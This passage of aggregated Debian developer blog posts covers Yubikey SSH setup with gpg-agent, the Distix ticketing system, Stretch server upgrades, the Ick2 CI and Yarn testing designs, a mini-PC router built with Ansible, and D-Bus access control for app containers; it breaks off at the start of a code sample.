  • To actually use the authentication-only subkey on the Yubikey for ssh, you need to configure your system to use gpg-agent as the SSH agent. Add the following line to .gnupg/gpg-agent.conf:
     enable-ssh-support
    
  • On a Debian stretch system with GNOME, edit /etc/xdg/autostart/gnome-keyring-ssh.desktop to have the following line, to prevent the GNOME ssh agent from starting up:
     Hidden=true
    
  • Edit /etc/X11/Xsession.options and remove or comment out the line that says use-ssh-agent. This stops a system-started ssh-agent from being started when the desktop starts.
  • Create the file ~/.config/autostart/gpg-agent.desktop with the following content:
     [Desktop Entry]
     Type=Application
     Name=gpg-agent
     Comment=gpg-agent
     Exec=/usr/bin/gpg-agent --daemon
     OnlyShowIn=GNOME;Unity;MATE;
     X-GNOME-Autostart-Phase=PreDisplayServer
     X-GNOME-AutoRestart=false
     X-GNOME-Autostart-Notify=true
     X-GNOME-Bugzilla-Bugzilla=GNOME
     X-GNOME-Bugzilla-Product=gnome-keyring
     X-GNOME-Bugzilla-Component=general
     X-GNOME-Bugzilla-Version=3.20.0
    
  • To test, log out, and back in again, run the following in a terminal:
$ ssh-add -l
The output should contain a line that looks like this:
    4096 SHA256:PDCzyQPpd9tiWsELM8LwaLBsMDMm42J8/eEfezNgnVc cardno:000604626953 (RSA)
  • You need to export the authentication-only subkey in the SSH key format. You need this for adding to .ssh/authorized_keys, if nothing else.
$ gpg --export-ssh-key keyid > ssh.pub
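For example (a sketch, with a hypothetical account and host), you could append the exported public key to a server's authorized_keys like this:
$ ssh user@server.example.com 'cat >> ~/.ssh/authorized_keys' < ssh.pub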
  • Happy hacking.
See also

See the following links; I've used them to learn enough to write the above.

Edited to fix:
  • Output of gpg -K after removing secret master key.

27 May 2017

Lars Wirzenius: Distix movement

Distix is my distributed ticketing system. I initially wrote the core of it as a bit of programming performance art, to celebrate my 30 years as a programmer. Distix is built on top of git and emails in Maildirs. It is a silent listener to your issue and bug discussions: as long as you ensure it gets a copy of each mail, it takes care of automatically arranging things into separate tickets based on email threading. Users and customers do not need to even know Distix is being used. Only the "support staff" need ever interact with Distix, and they mostly only need to close tickets that have been dealt with. I've been using Distix for my own stuff for some time now, and recently we've started using it at work. I slowly improve it as we find problems. It's not a sleek, smooth, finished tool. It's clunky, weird, and probably not what you want. But it's what I want. Changes in recent months:
  • There is a new website: http://distix.eu/. No particular good reason for a new website, but I won the domain for free a couple of years ago, so I might as well use it.
  • In addition, a ticketing system for Distix itself: http://tickets.distix.eu/. Possibly I should've called the subdomain dogfood, but I'm a serious person, not prone to trying to be funny.
  • Mails can now be imported using IMAP.
  • Importing has been optimized for speed and memory use, making my own production use more practical.
I've discussed with a friend the possibility of writing a web UI, and some day maybe that will happen. For now, Distix is a command line application that can generate a static HTML site.

24 May 2017

Steve Kemp: Getting ready for Stretch

I run about 17 servers. Of those, about six are very personal and the rest form a small cluster used for a single website. (Partly because the code is old and in some ways a bit badly designed, partly because "clustering!", "high availability!", "learning!", "fun!" - seriously I had a lot of fun putting together a fault-tolerant deployment with haproxy, ucarp, etc, etc. If I were paying for it the site would be both retired and static!) I've started the process of upgrading to stretch by picking a bunch of hosts that do things I could live without for a few days - in case there were big problems, or I needed to restore from backups. So far I've upgraded:
  • master.steve
    • This is a puppet-master, so while it is important killing it wouldn't be too bad - after all my nodes are currently setup properly, right?
    • Upgrading this host changed the puppet-server from 3.x to 4.x.
    • That meant I had to upgrade all my client-systems, because puppet 3.x won't talk to a 4.x master.
    • Happily jessie-backports contains a recent puppet-client.
    • It also meant I had to rework a lot of my recipes, in small ways.
  • builder.steve
    • This is a host I use to build packages upon, via pbuilder.
    • I have chroots setup for wheezy, jessie, and stretch, each in i386 and amd64 flavours.
  • git.steve
    • This is a host which stores my git-repositories, via gitbucket.
    • While it is an important host in terms of functionality, the software it needs is very basic: nginx proxies to a java application which runs on localhost:XXXX, with some caching magic happening to deal with abusive clients.
    • I do keep considering using gitlab, because I like its runners, etc. But that is pretty resource intensive.
    • On the other hand, if I did switch I could drop my builder.steve host, which might mean I'd come out ahead in terms of used resources.
  • leave.steve
    • Torrent-box.
    • Upgrading was painless, I only run rtorrent, and a simple object storage system of my own devising.
All upgrades were painless, with only one real surprise - the attic-backup software was removed from Debian. Although I do intend to retry using Lars' excellent Obnam in the near future, pragmatically I wanted to stick with what I'm familiar with. Borg backup is a fork of attic I've been aware of for a long time, but I never quite had a reason to try it out. Setting it up pretty much just meant editing my backup-script:
s/attic/borg/g
Once I did that, and created some new destinations, all was good:
borg@rsync.io ~ $ borg init /backups/git.steve.org.uk.borg/
borg@rsync.io ~ $ borg init /backups/master.steve.org.uk.borg/
borg@rsync.io ~ $ ..
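From there, each backup run is just a borg create against one of those repositories; a minimal sketch, run from the client (the source path here is hypothetical):
borg create --stats borg@rsync.io:/backups/git.steve.org.uk.borg::$(date +%F) /srv/git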
Upgrading other hosts, for example my website(s), and my email-box, will be more complex and fiddly. On that basis they will definitely wait for the formal stretch release. But having a couple of hosts running the frozen distribution is good for testing, and to let me see what is new.

8 May 2017

Lars Wirzenius: Ick2 design discussion

Recently, Daniel visited us in Helsinki. In addition to enjoying local food and scenery, we spent some time together in front of a whiteboard to sketch out designs for Ick2. Ick is my continuous integration system, and it's all Daniel's fault for suggesting the name. Ahem. I am currently using the first generation of Ick and it is a rigid, cumbersome, and fragile thing. It works well enough that I don't miss Jenkins, but I would like something better. That's the second generation of Ick, or Ick2, and that's what we discussed with Daniel. Where pretty much everything in Ick1 is hardcoded, everything in Ick2 will be user-configurable. It's my last, best chance to go completely overboard in the second system syndrome manner. Where Ick1 was written in a feverish two-week hacking session, rushed because my Jenkins install at the time had broken one time too many, we're taking our time with Ick2. Slow and careful is the tune this time around. Our "minimum viable product" or MVP for Ick2 is defined like this:
Ick2 builds static websites from source in a git repository, using ikiwiki, and published to a web server using rsync. A change to the git repository triggers a new build. It can handle many separate websites, and if given enough worker machines, can build many of them concurrently.
This is a real task, and something we already do with Ick1 at work. It's a reasonable first step for the new program. Some decisions we made:
  • The Ick2 controller, which decides which projects to build, and what's the next build step at any one time, will be reactive only. It will do nothing except in response to an HTTP API request. This includes things like timed events. An external service will need to poke the controller at the right time.
  • The controller will be accompanied by worker manager processes, which fetch instructions of what to do next, and control the actual worker over ssh.
  • Provisioning of the workers is out of scope for the MVP. For the MVP we are OK with a static list of workers. In the future we might make worker registration a dynamic thing, but not for the MVP. (Parts or all of this decision may be changed in the future, but we need to start somewhere.)
  • The MVP publishing will happen by running rsync to a web server. Providing credentials for the workers to do that is the sysadmin's problem, not something the MVP will handle itself.
  • The MVP needs to handle more than one worker, and more than one pipeline, and needs to build things concurrently when there's call for it.
  • The MVP will need to read the pipelines (and their steps and any other info) from YAML config files, and can't have that stuff hardcoded.
  • The MVP API will have no authentication or authorization stuff yet.
The initial pipelines will be basically like this, but expressed in some way by the user:
  1. Clone the source repository.
  2. Run ikiwiki --build to build the website.
  3. Run rsync to publish the website on a server.
Assumptions:
  • Every worker can clone from the git server.
  • Every worker has all the build tools.
  • Every worker has rsync and access to every web server.
  • Every pipeline run is clean.
Actions the Ick2 controller API needs to support:
  • List all existing projects.
  • Trigger a project to build.
  • Query what project builds are running.
  • Get build logs for a project: current log (from the running build), and the most recent finished build.
A sketch API:
  • POST /projects/foo/+trigger Trigger build of project foo. If the git hasn't changed, the build runs anyway.
  • GET /projects List names of all projects.
  • GET /projects/foo On second thought, I can't think of anything useful for this to return for the MVP. Scratch.
  • GET /projects/foo/logs/current Return entire known build log captured so far for the currently running build.
  • GET /projects/foo/logs/previous Return entire build log for latest finished build.
  • GET /work/bar Used by worker bar: return next not-yet-finished step to run as a JSON object containing fields "project" (name of project for which to run the step) and "shell" (a shell command to run). The call will return the same JSON object until the worker reports it as having finished.
  • POST /work/bar/snippet Used by worker bar to report progress on the currently running step: a JSON object containing fields "stdout" (string with output from the shell command's stdout), "stderr" (ditto but stderr), and "exit_code" (the shell command's exit code, if it's finished, or null).
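As a rough illustration of this API sketch, from the command line (the host name and the shell command in the response are hypothetical, not part of the design):
curl -X POST http://ick2.example.com/projects/foo/+trigger
curl http://ick2.example.com/work/bar
The second call would return a JSON object along the lines of {"project": "foo", "shell": "git clone git://git.example.com/foo.git src"}, and keeps returning it until the worker manager reports the step as finished.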
Sequence:
  • Git server has a hook that calls "POST /projects/foo/+trigger" (or else this is simulated by the user).
  • Controller adds a build of project foo to the queue.
  • Worker manager calls "GET /work/bar", gets a shell command to run, and starts running it on its worker.
  • While worker runs shell command, every second or so, worker manager calls "POST /work/bar/snippet" to report progress including collected output, if any.
  • Controller responds with OK or KILL, and if the latter, worker kills the command it is running. Worker manager continues reporting progress via snippet until shell command is finished (on its own or by having been killed).
  • Controller appends any output reported via .../snippet. When it learns a shell command has finished, it updates its idea of the next step to run.
  • When controller learns a project has finished building, it rotates the current build log to be the previous one.
The next step will probably be to sketch a yarn test suite of the API and implement a rudimentary one.

5 May 2017

Daniel Silverstone: Yarn architecture discussion

Recently Rob and I visited Soile and Lars. We had a lovely time wandering around Helsinki with them, and I also spent a good chunk of time with Lars working on some design and planning for the Yarn test specification and tooling. You see, I wrote a Rust implementation of Yarn called rsyarn "for fun" and in doing so I noted a bunch of missing bits in the understanding Lars and I shared about how Yarn should work. Lars and I filled, and re-filled, a whiteboard with discussion about what the 'Yarn specification' should be, about various language extensions and changes, and also about what functionality a normative implementation of Yarn should have. This article is meant to be a write-up of all of that discussion, but before I start on that, I should probably summarise what Yarn is.
Yarn is a mechanism for specifying tests in a form which is more like documentation than code. Yarn follows the concept of BDD story based design/testing and has a very Cucumberish scenario language in which to write tests. Yarn takes, as input, Markdown documents which contain code blocks with Yarn tests in them; and it then runs those tests and reports on the scenario failures/successes. As an example of a poorly written but still fairly effective Yarn suite, you could look at Gitano's tests or perhaps at Obnam's tests (rendered as HTML). Yarn is not trying to replace unit testing, nor other forms of testing, but rather seeks to be one of a suite of test tools used to help validate software and to verify integrations. Lars writes Yarns which test his server setups, for example. As an example, let's look at what a simple test might be for the behaviour of the /bin/true tool:
SCENARIO true should exit with code zero
WHEN /bin/true is run with no arguments
THEN the exit code is 0
 AND stdout is empty
 AND stderr is empty
Anyone ought to be able to understand exactly what that test is doing, even though there's no obvious code to run. Yarn statements are meant to be easily grokked by both developers and managers. This should be so that managers can understand the tests which verify that requirements are being met, without needing to grok python, shell, C, or whatever else is needed to implement the test where the Yarns meet the metal. Obviously, there needs to be a way to join the dots, and Yarn calls those things IMPLEMENTS, for example:
IMPLEMENTS WHEN (\S+) is run with no arguments
set +e
"$ MATCH_1 " > "$ DATADIR /stdout" 2> "$ DATADIR /stderr"
echo $? > "$ DATADIR /exitcode"
As you can see from the example, Yarn IMPLEMENTS can use regular expressions to capture parts of their invocation, allowing the test implementer to handle many different scenario statements with one implementation block. For the rest of the implementation, whatever you assume about things will probably be okay for now.
Given all of the above, we (Lars and I) decided that it would make a lot of sense if there was a set of Yarn scenarios which could validate a Yarn implementation. Such a document could also form the basis of a Yarn specification and also a manual for writing reasonable Yarn scenarios. As such, we wrote up a three-column approach to what we'd need in that test suite. Firstly we considered what the core features of the Yarn language are:
  • Scenario statements themselves (SCENARIO, GIVEN, WHEN, THEN, ASSUMING, FINALLY, AND, IMPLEMENTS, EXAMPLE, ...)
  • Whitespace normalisation of statements
  • Regexp language and behaviour
  • IMPLEMENTS current directory, data directory, home directory, and also environment.
  • Error handling for the statements, or for missing IMPLEMENTS
  • File (and filename) encoding
  • Labelled code blocks (since commonmark includes the backtick code block kind)
  • Exactly one IMPLEMENTS per statement
We considered unusual (or corner) cases and which of them needed defining in the short to medium term:
  • Statements before any SCENARIO or IMPLEMENTS
  • Meaning of split code blocks (concatenation?)
  • Meaning of code blocks not at the top level of a file (ignore?)
  • Meaning of HTML style comments in markdown files
  • Odd scenario ordering (e.g. ASSUMING at the end, or FINALLY at the start)
  • Meaning of empty lines in code blocks or between them.
All of this comes down to how to interpret input to a Yarn implementation. In addition there were a number of things we felt any "normative" Yarn implementation would have to handle or provide in order to be considered useful. It's worth noting that we don't specify anything about an implementation being a command line tool though...
  • Interpreter for IMPLEMENTS (and arguments for them)
  • "Library" for those implementations
  • Ability to require that failed ASSUMING statements lead to an error
  • A way to 'stop on first failure'
  • A way to select a specific scenario to run, from a large suite.
  • Generation of timing reports (per scenario and also per statement)
  • A way to 'skip' missing IMPLEMENTS
  • A clear way to identify the failing step in a scenario.
  • Able to treat multiple input files as a single suite.
There's bound to be more, but right now with the above, we believe we have two roughly conformant Yarn implementations. Lars' Python based implementation which lives in cmdtest (and which I shall refer to as pyyarn for now) and my Rust based one (rsyarn).
One thing which rsyarn supports, but pyyarn does not, is running multiple scenarios in parallel. However, when I wrote that support into rsyarn I noticed that there were plenty of issues with running stuff in parallel. (A problem I'm sure any of you who know about threads will appreciate.) One particular issue was that scenarios often need to share resources which are not easily sandboxed into the ${DATADIR} provided by Yarn. For example, databases or access to limited online services. Lars and I had a good chat about that, and decided that a reasonable language extension could be:
USING database foo
with its counterpart
RESOURCE database (\S+)
LABEL database-$1
GIVEN a database called $1
FINALLY database $1 is torn down
The USING statement should be reasonably clear in its pairing to a RESOURCE statement. The LABEL statement I'll get to in a moment (though it's only relevant in a RESOURCE block), and the rest of the statements are essentially substituted into the calling scenario at the point of the USING. This is nowhere near ready to consider adding to the specification though. Both Lars and I are uncomfortable with the $1 syntax, though we can't think of anything nicer right now; and the USING/RESOURCE/LABEL vocabulary isn't set in stone either. The idea of the LABEL is that we'd also require that a normative Yarn implementation be capable of specifying resource limits by name. E.g. if a RESOURCE used a LABEL foo then the caller of a Yarn scenario suite could specify that there were 5 foos available. The Yarn implementation would then schedule a maximum of 5 scenarios which are using that label to happen simultaneously. At bare minimum it'd gate new users, but at best it would intelligently schedule them. In addition, since this introduces the concept of parallelism into Yarn proper, we also wanted to add a maximum parallelism setting to the Yarn implementation requirements; and to specify that any resource label which was not explicitly set had a usage limit of 1.
Once we'd discussed the parallelism, we decided that once we had a nice syntax for expanding these sets of statements anyway, we may as well have a syntax for specifying scenario language expansions which could be used to provide something akin to macros for Yarn scenarios. What we came up with as a starter-for-ten was:
CALLING write foo
paired with
EXPANDING write (\S+)
GIVEN bar
WHEN $1 is written to
THEN success was had by all
Again, the CALLING/EXPANDING keywords are not fixed yet, nor is the $1 type syntax, though whatever is used here should match the other places where we might want it.
Finally we discussed multi-line inputs in Yarn. We currently have a syntax akin to:
GIVEN foo
... bar
... baz
which is directly equivalent to:
GIVEN foo bar baz
and this is achieved by collapsing the multiple lines and using the whitespace normalisation functionality of Yarn to replace all whitespace sequences with single space characters. However this means that, for example, injecting chunks of YAML into a Yarn scenario is a pain, as would be including any amount of another whitespace-sensitive input language. After a lot of to-ing and fro-ing, we decided that the right thing to do would be to redefine the ... Yarn statement to be whitespace preserving and to then pass that whitespace through to be matched by the IMPLEMENTS or whatever. In order for that to work, the regexp matching would have to be defined to treat the input as a single line, allowing . to match \n etc. Of course, this would mean that the old functionality wouldn't be possible, so we considered allowing a \ at the end of a line to provide the current kind of behaviour, rewriting the above example as:
GIVEN foo \
bar \
baz
It's not as nice, but since we couldn't find any real uses of ... in any of our Yarn suites where having the whitespace preserved would be an issue, we decided it was worth the pain.
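As a sketch of the difference (my own illustration, not code from either implementation): today the continuation lines are collapsed, whereas the proposal keeps the whitespace and relies on the IMPLEMENTS regexp being matched in single-line (DOTALL) mode:
import re

# Current behaviour: join the "..." continuation lines and collapse all
# runs of whitespace to single spaces before matching.
def collapse(statement_lines):
    joined = " ".join(line.lstrip(". ").strip() for line in statement_lines)
    return re.sub(r"\s+", " ", joined)

# Proposed behaviour: keep the newlines and any indentation after the
# "... " prefix, and hand the whole thing to the IMPLEMENTS regexp.
def preserve(statement_lines):
    first, rest = statement_lines[0], statement_lines[1:]
    return "\n".join([first] + [line[len("... "):] for line in rest])

lines = ["GIVEN the config", "... key: value", "...   nested: true"]
print(repr(collapse(lines)))   # 'GIVEN the config key: value nested: true'
print(repr(preserve(lines)))   # 'GIVEN the config\nkey: value\n  nested: true'

# With whitespace preserved, a DOTALL pattern can capture a multi-line
# payload (for example a chunk of YAML) in one group.
pattern = re.compile(r"GIVEN the config\s(?P<payload>.*)", re.DOTALL)
print(pattern.match(preserve(lines)).group("payload"))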
None of the above is, as of yet, set in stone. This blog posting is about me recording the information so that it can be referred to; and also to hopefully spark a little bit of discussion about Yarn. We'd welcome emails to our usual addresses, being poked on Twitter, or on IRC in the common spots we can be found. If you're honestly unsure of how to get hold of us, just comment on this blog post and I'll find your message eventually. Hopefully soon we can start writing that Yarn suite which can be used to validate the behaviour of pyyarn and rsyarn and from there we can implement our new proposals for extending Yarn to be even more useful.

29 March 2017

Lars Wirzenius: A tiny PC as a router

We needed a router and wifi access point in the office, and simultaneously both I and my co-worker Ivan needed such a thing at our respective homes. After some discussion, and after reading articles in Ars Technica about building PCs to act as routers, we decided to do just that.
  • The PC solution seems to offer better performance, but this is actually not a major reason for us.
  • We want to have systems we understand and can hack. A standard x86 PC running Debian sounds ideal to use.
  • Why not a cheap commercial router? They tend to be opaque and mysterious, and can't be managed with standard tooling such as Ansible. They may or may not have good security support. Also, they may or may not have sufficient functionality for nice things, such as DNS for local machines, or the full power of iptables for firewalling.
  • Why not OpenWRT? Some models of commercial routers are supported by OpenWRT. Finding good hardware that is also supported by OpenWRT is a task in itself, and not the kind of task I especially like to do. Even if one goes this route, the environment isn't quite a standard Linux system, because of various hardware limitations. (OpenWRT is a worthy project, just not our preference.)
We got some hardware:
Component      Model                                                               Cost
Barebone       Qotom Q190G4, VGA, 2x USB 2.0, 134x126x36mm, fanless                130
CPU            Intel J1900, 2-2.4GHz quad-core                                     -
NIC            Intel WG82583, 4x 10/100/1000                                       -
Memory         Crucial CT102464BF160B, 8GB DDR3L-1600 SODIMM 1.35V CL11            40
SSD            Kingston SSDNow mS200, 60GB mSATA                                   42
WLAN           AzureWave AW-NU706H, Ralink RT3070L, 300M 802.11b/g/n, half mPCIe   17
mPCIe adapter  Half to full mPCIe adapter                                          3
Antennas       2x 2.4/5GHz 6dBi, RP-SMA, U.FL cables                               7
These were bought at various online shops, including AliExpress and verkkokauppa.com. After assembling the hardware, we installed Debian on them:
  • Connect the PC to a monitor (VGA) and keyboard (USB), as well as power.
  • I built a "factory image" to be put on the SSD, and a USB stick installer image, which includes the factory one. Write the installer image on a USB stick, boot off that, then copy the factory image to the SSD and reboot off the SSD.
  • The router now runs a very bare-bones, stripped-down Debian system, which runs a DHCP server on eth3 (marked LAN4 on the box). You can log in as root on the console (no password), or via ssh, but for ssh you need to replace the /home/ansible/.ssh/authorized_keys file with one that contains only your public ssh key.
  • Connect a laptop to the Ethernet port marked LAN4, and get an IP address with DHCP.
  • Log in with ssh to ansible@10.0.0.4, and verify that sudo id works without a password. Except you can't do this unless you put your ssh key in the authorized_keys file mentioned above.
  • Git clone the ansible playbooks, adjust their parameters in minipc-router.yml as wanted, and run the playbook. Then reboot the router again.
  • You should now have wifi, routing (with NAT), and be generally speaking able to do networking.
There are a lot of limitations and problems:
  • There's no web UI for managing anything. If you're not comfortable doing sysadmin via ssh (with or without ansible), this isn't for you.
  • No IPv6. We didn't want to enable it yet, until we understand it better. You can, if you want to.
  • No real firewalling, but adjust roles/router/files/ferm.conf as you wish.
  • The router factory image is 4 GB in size, and our SSD is 60 GB. That's a lot of wasted space.
  • The router factory image embeds our public keys in the ansible user's authorized keys file for ssh. This is because we built this for ourselves first. If there's interest by others in using the images, we'll solve this.
  • Probably a lot of stupid things. Feel free to tell us about them (bugs@liw.fi would be a good address for that).
If you'd like to use the images and Ansible playbooks, please do. We'd be happy to get feedback, bug reports, and patches. Send them to me (liw@liw.fi) or my ticketing system (bugs@liw.fi).

23 March 2017

Simon McVittie: GTK hackfest 2017: D-Bus communication with containers

At the GTK hackfest in London (which accidentally became mostly a Flatpak hackfest) I've mainly been looking into how to make D-Bus work better for app container technologies like Flatpak and Snap. The initial motivating use cases are:
  • Portals: Portal authors need to be able to identify whether the portal is being contacted by an uncontained process (running with the user's full privileges), or whether it is being contacted by a contained process (in a container created by Flatpak or Snap).
  • dconf: Currently, a contained app either has full read/write access to dconf, or no access. It should have read/write access to its own subtree of dconf configuration space, and no access to the rest.
At the moment, Flatpak runs a D-Bus proxy for each app instance that has access to D-Bus, connects to the appropriate bus on the app's behalf, and passes messages through. That proxy is in a container similar to the actual app instance, but not actually the same container; it is trusted to not pass messages through that it shouldn't pass through. The app-identification mechanism works in practice, but is Flatpak-specific, and has a known race condition due to process ID reuse and limitations in the metadata that the Linux kernel maintains for AF_UNIX sockets. In practice the use of X11 rather than Wayland in current systems is a much larger loophole in the container than this race condition, but we want to do better in future. Meanwhile, Snap does its sandboxing with AppArmor, on kernels where it is enabled both at compile-time (Ubuntu, openSUSE, Debian, Debian derivatives like Tails) and at runtime (Ubuntu, openSUSE and Tails, but not Debian by default). Ubuntu's kernel has extra AppArmor features that haven't yet gone upstream, some of which provide reliable app identification via LSM labels, which dbus-daemon can learn by querying its AF_UNIX socket. However, other kernels like the ones in openSUSE and Debian don't have those. The access-control (AppArmor mediation) is implemented in upstream dbus-daemon, but again doesn't work portably, and is not sufficiently fine-grained or flexible to do some of the things we'll likely want to do, particularly in dconf. After a lot of discussion with dconf maintainer Allison Lortie and Flatpak maintainer Alexander Larsson, I think I have a plan for fixing this. This is all subject to change: see fd.o #100344 for the latest ideas.
Identity model
Each user (uid) has some uncontained processes, plus 0 or more containers. The uncontained processes include dbus-daemon itself, desktop environment components such as gnome-session and gnome-shell, the container managers like Flatpak and Snap, and so on. They have the user's full privileges, and in particular they are allowed to do privileged things on the user's session bus (like running dbus-monitor), and act with the user's full privileges on the system bus. In generic information security jargon, they are the trusted computing base; in AppArmor jargon, they are unconfined. The containers are Flatpak apps, or Snap apps, or other app-container technologies like Firejail and AppImage (if they adopt this mechanism, which I hope they will), or even a mixture (different app-container technologies can coexist on a single system). They are containers (or container instances) and not "apps", because in principle, you could install com.example.MyApp 1.0, run it, and while it's still running, upgrade to com.example.MyApp 2.0 and run that; you'd have two containers for the same app, perhaps with different permissions. Each container has a container type, which is a reversed DNS name like org.flatpak or io.snapcraft representing the container technology, and an app identifier, an arbitrary non-empty string whose meaning is defined by the container technology. For Flatpak, that string would be another reversed DNS name like com.example.MyGreatApp; for Snap, as far as I can tell it would look like example-my-great-app. The container technology can also put arbitrary metadata on the D-Bus representation of a container, again defined and namespaced by the container technology. For instance, Flatpak would use some serialization of the same fields that go in the Flatpak metadata file at the moment.
Finally, the container has an opaque container identifier identifying a particular container instance. For example, launching com.example.MyApp twice (maybe different versions or with different command-line options to flatpak run) might result in two containers with different privileges, so they need to have different container identifiers.
Contained server sockets
App-container managers like Flatpak and Snap would create an AF_UNIX socket inside the container, bind() it to an address that will be made available to the contained processes, and listen(), but not accept() any new connections. Instead, they would fd-pass the new socket to the dbus-daemon by calling a new method, and the dbus-daemon would proceed to accept() connections after the app-container manager has signalled that it has called both bind() and listen(). (See fd.o #100344 for full details.) Processes inside the container must not be allowed to contact the AF_UNIX socket used by the wider, uncontained system - if they could, the dbus-daemon wouldn't be able to distinguish between them and uncontained processes and we'd be back where we started. Instead, they should have the new socket bind-mounted into their container's XDG_RUNTIME_DIR and connect to that, or have the new socket set as their DBUS_SESSION_BUS_ADDRESS and be prevented from connecting to the uncontained socket in some other way. Those familiar with the kdbus proposals a while ago might recognise this as being quite similar to kdbus' concept of endpoints, and I'm considering reusing that name. Along with the socket, the container manager would pass in the container's identity and metadata, and the method would return a unique, opaque identifier for this particular container instance. The basic fields (container technology, technology-specific app ID, container ID) should probably be added to the result of GetConnectionCredentials(), and there should be a new API call to get all of those plus the arbitrary technology-specific metadata. When a process from a container connects to the contained server socket, every message that it sends should also have the container instance ID in a new header field. This is OK even though dbus-daemon does not (in general) forbid sender-specified future header fields, because any dbus-daemon that supported this new feature would guarantee to set that header field correctly, the existing Flatpak D-Bus proxy already filters out unknown header fields, and adding this header field is only ever a reduction in privilege. The reasoning for using the sender's container instance ID (as opposed to the sender's unique name) is for services like dconf to be able to treat multiple unique bus names as belonging to the same equivalence class of contained processes: instead of having to look up the container metadata once per unique name, dconf can look it up once per container instance the first time it sees a new identifier in a header field. For the second and subsequent unique names in the container, dconf can know that the container metadata and permissions are identical to the one it already saw.
Access control
In principle, we could have the new identification feature without adding any new access control, by keeping Flatpak's proxies.
However, in the short term that would mean we'd be adding new API to set up a socket for a container without any access control, and having to keep the proxies anyway, which doesn't seem great; in the longer term, I think we'd find ourselves adding a second new API to set up a socket for a container with new access control. So we might as well bite the bullet and go for the version with access control immediately. In principle, we could also avoid the need for new access control by ensuring that each service that will serve contained clients does its own. However, that makes it really hard to send broadcasts and not have them unintentionally leak information to contained clients - we would need to do something more like kdbus' approach to multicast, where services know who has subscribed to their multicast signals, and that is just not how dbus-daemon works at the moment. If we're going to have access control for broadcasts, it might as well also cover unicast. The plan is that messages from containers to the outside world will be mediated by a new access control mechanism, in parallel with dbus-daemon's current support for firewall-style rules in the XML bus configuration, AppArmor mediation, and SELinux mediation. A message would only be allowed through if the XML configuration, the new container access control mechanism, and the LSM (if any) all agree it should be allowed. By default, processes in a container can send broadcast signals, and send method calls and unicast signals to other processes in the same container. They can also receive method calls from outside the container (so that interfaces like org.freedesktop.Application can work), and send exactly one reply to each of those method calls. They cannot own bus names, communicate with other containers, or send file descriptors (which reduces the scope for denial of service). Obviously, that's not going to be enough for a lot of contained apps, so we need a way to add more access. I'm intending this to be purely additive (start by denying everything except what is always allowed, then add new rules), not a mixture of adding and removing access like the current XML policy language. There are two ways we've identified for rules to be added:
  • The container manager can pass a list of rules into the dbus-daemon at the time it attaches the contained server socket, and they'll be allowed. The obvious example is that an org.freedesktop.Application needs to be allowed to own its own bus name. Flatpak apps' implicit permission to talk to portals, and Flatpak metadata like org.gnome.SessionManager=talk, could also be added this way.
  • System or session services that are specifically designed to be used by untrusted clients, like the version of dconf that Allison is working on, could opt-in to having contained apps allowed to talk to them (effectively making them a generalization of Flatpak portals). The simplest such request, for something like a portal, is "allow connections from any container to contact this service"; but for dconf, we want to go a bit finer-grained, with all containers allowed to contact a single well-known rendezvous object path, and each container allowed to contact an additional object path subtree that is allocated by dconf on-demand for that app.
Initially, many contained apps would work in the first way (and in particular sockets=session-bus would add a rule that allows almost everything), while over time we'll probably want to head towards recommending more use of the second.
Related topics
Access control on the system bus
We talked about the possibility of using a very similar ruleset to control access to the system bus, as an alternative to the XML rules found in /etc/dbus-1/system.d and /usr/share/dbus-1/system.d. We didn't really come to a conclusion here. Allison had the useful insight that the XML rules are acting like a firewall: they're something that is placed in front of potentially-broken services, and not part of the services themselves (which, as with firewalls like ufw, makes it seem rather odd when the services themselves install rules). D-Bus system services already have total control over what requests they will accept from D-Bus peers, and if they rely on the XML rules to mediate that access, they're essentially rejecting that responsibility and hoping the dbus-daemon will protect them. The D-Bus maintainers would much prefer it if system services took responsibility for their own access control (with or without using polkit), because fundamentally the system service is always going to understand its domain and its intended security model better than the dbus-daemon can. Analogously, when a network service listens on all addresses and accepts requests from elsewhere on the LAN, we sometimes work around that by protecting it with a firewall, but the optimal resolution is to get that network service fixed to do proper authentication and access control instead. For system services, we continue to recommend essentially this "firewall" configuration, filling in the ${...} variables as appropriate:
<busconfig>
    <policy user="${the daemon uid under which the service runs}">
        <allow own="${the service's bus name}"/>
    </policy>
    <policy context="default">
        <allow send_destination="${the service's bus name}"/>
    </policy>
</busconfig>
We discussed the possibility of moving towards a model where the daemon uid to be allowed is written in the .service file, together with an opt-in to "modern D-Bus access control" that makes the "firewall" unnecessary; after some flag day when all significant system services follow that pattern, dbus-daemon would even have the option of no longer applying the "firewall" (moving to an allow-by-default model) and just refusing to activate system services that have not opted in to being safe to use without it. However, the "firewall" also protects system bus clients, and services like Avahi that are not bus-activatable, against unintended access, which is harder to solve via that approach; so this is going to take more thought. For system services' clients that follow the "agent" pattern (BlueZ, polkit, NetworkManager, Geoclue), the correct "firewall" configuration is more complicated. At some point I'll try to write up a best-practice for these.
New header fields for the system bus
At the moment, it's harder than it needs to be to provide non-trivial access control on the system bus, because on receiving a method call, a service has to remember what was in the method call, then call GetConnectionCredentials() to find out who sent it, then only process the actual request when it has the information necessary to do access control. Allison and I had hoped to resolve this by adding new D-Bus message header fields with the user ID, the LSM label, and other interesting facts for access control. These could be "opt-in" to avoid increasing message sizes for no reason: in particular, it is not typically useful for session services to receive the user ID, because only one user ID is allowed to connect to the session bus anyway. Unfortunately, the dbus-daemon currently lets unknown fields through without modification. With hindsight this seems an unwise design choice, because header fields are a finite resource (there are 255 possible header fields) and are defined by the D-Bus Specification. The only field that can currently be trusted is the sender's unique name, because the dbus-daemon sets that field, overwriting the value in the original message (if any). To make it safe to rely on the new fields, we would have to make the dbus-daemon filter out all unknown header fields, and introduce a mechanism for the service to check (during connection to the bus) whether the dbus-daemon is sufficiently new that it does so. If connected to an older dbus-daemon, the service would not be able to rely on the new fields being true, so it would have to ignore the new fields and treat them as unset. The specification is sufficiently vague that making new dbus-daemons filter out unknown header fields is a valid change (it just says that "Header fields with an unknown or unexpected field code must be ignored", without specifying who must ignore them, so having the dbus-daemon delete those fields seems spec-compliant). This all seemed fine when we discussed it in person; but GDBus already has accessors for arbitrary header fields by numeric ID, and I'm concerned that this might mean it's too easy for a system service to be accidentally insecure: It would be natural (but wrong!) for an implementor to assume that if g_message_get_header (message, G_DBUS_MESSAGE_HEADER_FIELD_SENDER_UID) returned non-NULL, then that was guaranteed to be the correct, valid sender uid. As a result, fd.o #100317 might have to be abandoned. I think more thought is needed on that one.
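For reference, this is roughly what that dance looks like today from a service written with PyGObject and GDBus (a sketch; the sender name and the uid check are invented for the example): stash the method call, ask the dbus-daemon who sent it, and only then decide whether to process it:
from gi.repository import Gio, GLib

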